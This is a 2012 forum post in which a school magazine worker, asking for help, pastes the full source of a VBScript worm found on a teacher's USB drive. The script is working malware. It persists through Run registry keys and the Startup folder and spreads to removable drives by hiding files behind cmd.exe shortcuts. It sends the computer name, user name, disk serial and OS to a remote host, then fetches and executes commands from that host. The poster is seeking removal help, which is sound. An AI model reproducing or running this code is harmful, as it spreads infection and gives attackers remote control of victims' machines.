Jump to content

Welcome to Geeks to Go - Register now for FREE

Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!

How it Works Create Account
Photo

What does this 'virus'/script does?

Started by kmlkz , Dec 04 2012 05:28 PM

  • Please log in to reply

#1
kmlkz
Posted 04 December 2012 - 05:28 PM

kmlkz

    New Member

  • Member
  • Pip
  • 1 posts
I work for a school magazine and one of the teachers got her usb flash drive infected from the printing room's computers. I checked her flash drive and all of the files inside has been turned into a working shortcut but the files are actually hidden (still there just folder hidden). The shortcut's target was window's cmd and will start the file and the script/virus itself every time the shortcut is opened. It appears only the flash drive is infected not her laptop. There's a folder hidden script (.vbs) inside the pendrive:

'<[ coded bY njq8 ]>'
On Error Resume Next
dim sh ' shell
set sh =WScript.CreateObject("WScript.Shell")
dim fs ' filesystem
set fs= CreateObject("Scripting.FileSystemObject") 
dim host
host="jn.redirectme.net"
dim port
port=7777
dim DR
DR = sh.ExpandEnvironmentStrings("%temp%") & "\"
dim FN
FN ="Servieca.vbs"
dim fh
dim us
us="~"
ins
dim spl
spl="jnJnj"
dim i
i=0
while true
dim a 
a= split(post("ready",""),spl)
select case a(0)
case "exc"
dim sa
sa= a(1)
execute sa
case "uns"
uns
end select
wscript.sleep 4000
i = i + 1
if i> 2 then
i=0
xins
end if
wend

function ins
on error resume next
us= sh.regread("HKCU\njq8")
if us="~" then
if lcase( mid(wscript.scriptfullname,2))=":\" & lcase(fn) then
us="y"
sh.regwrite "HKCU\njq8", us, "REG_SZ"
else
us="n"
sh.regwrite "HKCU\njq8", us, "REG_SZ"
end if
end if
Err.Clear
fs.CopyFile wscript.scriptfullname,dr & fn ,true
set fh = fs.OpenTextFile( dr & fn, 8, false)
if Err.Number>0 then
wscript.quit
end if
xins
end function

sub xins
on error resume next
sh.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & fn, chrw(34) & dr & fn & chrw(34), "REG_SZ"
sh.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & fn, chrw(34) & dr & fn & chrw(34), "REG_SZ"
fs.copyfile wscript.scriptfullname, CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & fn ,true
for each xx in fs.Drives
if xx.isready then
if xx.FreeSpace >0 then
if xx.drivetype=1 then
if fs.fileexists(xx.path & "\" & fn) then
fs.getfile(xx.path & "\" & fn).Attributes=0
end if
fs.copyfile dr & fn , xx.path & "\" & fn,true
For Each x In fs.GetFolder( xx.path & "\" ).Files
wscript.sleep 1
if instr(x.name,".") then
if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" then
x.Attributes = 2
if ucase(x.name) <> ucase(fn) then
With sh.CreateShortcut(xx.path & "\" & x.name & ".lnk") 
.TargetPath = "cmd.exe"
.WorkingDirectory = ""
.Arguments = "/c start " & Replace(fn," ", ChrW(34) _
& " " & ChrW(34)) & "&start " & replace( x.name," ", ChrW(34) & " " & ChrW(34)) & " & exit"
.IconLocation = sh.regread("HKLM\SOFTWARE\Classes\" & sh.regread("HKLM\SOFTWARE\Classes\." & Split(x.name, ".")(UBound(Split(x.name, "."))) & "\") & "\DefaultIcon\")
if instr( .iconlocation,",")=0 then
.iconlocation = .iconlocation &",0"
end if
.Save()
end with
end if
end if
end if
Next
end if
end if
end if
next
Err.Clear
end sub

function uns
on error resume next
fh.close
sh.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\" & fn
sh.RegDelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\" & fn
fs.DeleteFile dr & fn ,true
fs.DeleteFile CreateObject("Shell.Application").NameSpace(&H7).Self.Path &"\" & fn ,true
for each xx in fs.Drives
if xx.isready then
if xx.FreeSpace >0 then
For Each x In fs.GetFolder( xx.path & "\").Files
On Error Resume Next
if instr(x.name,".") then
if lcase( Split(x.name, ".")(UBound(Split(x.name, "."))))<>"lnk" then
x.Attributes = 0
if ucase(x.name) <> ucase(fn) then
fs.deletefile(xx.path & "\" & x.name & ".lnk" )
else
fs.deletefile( xx.path & "\" & x.name )
end if
end if
end if
Next
end if
end if
next
wscript.quit
end function

function post(cmd ,da)
post=""
Dim o
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "POST","http://" & host & ":" & port &"/" & cmd, false
o.setRequestHeader "User-Agent:", inf
o.send da
post=o.responseText
end function

dim xinf
function inf
on error resume next
if xinf="" then
dim s
s="??"
s = hwd
inf = inf & s & "\"
s="??"
s= sh.ExpandEnvironmentStrings("%COMPUTERNAME%")
inf = inf & s & "\"
s="??"
s= sh.ExpandEnvironmentStrings("%USERNAME%")
inf = inf & s & "\"
s="??"
Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set aa = a.ExecQuery ("Select * from Win32_OperatingSystem")
For Each aaa in aa
s= aaa.Caption 
exit for
Next
inf = inf & s & "\\0.3\" & us &"\" & pid 
xinf=inf
else
inf=xinf
end if
end function

function HWD
HWD="CH_??"
On Error Resume Next
Set a = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
Set aa = a.ExecQuery("SELECT * FROM Win32_LogicalDisk")
For Each aaa In aa
if aaa.VolumeSerialNumber<>"" then
HWD= "CH_" & aaa.VolumeSerialNumber
exit for
end if
Next
end function

Function PID
PID=0
on error resume next
PID = GetObject("winmgmts:root\cimv2").Get("Win32_" &_
"Process.Handle='" & _
sh.Exec("mshta.exe").ProcessID & "'").ParentProcessId
End Function

i terminated wscript and removed the script from /temp and startup.. but i'm not sure what the opening of the port and most of the script does :| (also malware bytes returned nothing)

Edited by kmlkz, 04 December 2012 - 05:33 PM.

  • 0

Advertisements

Back to Virus, Spyware, Malware Removal · Next Unread Topic →




Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

  1. Geeks to Go Community
  2. Security
  3. Virus, Spyware, Malware Removal

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP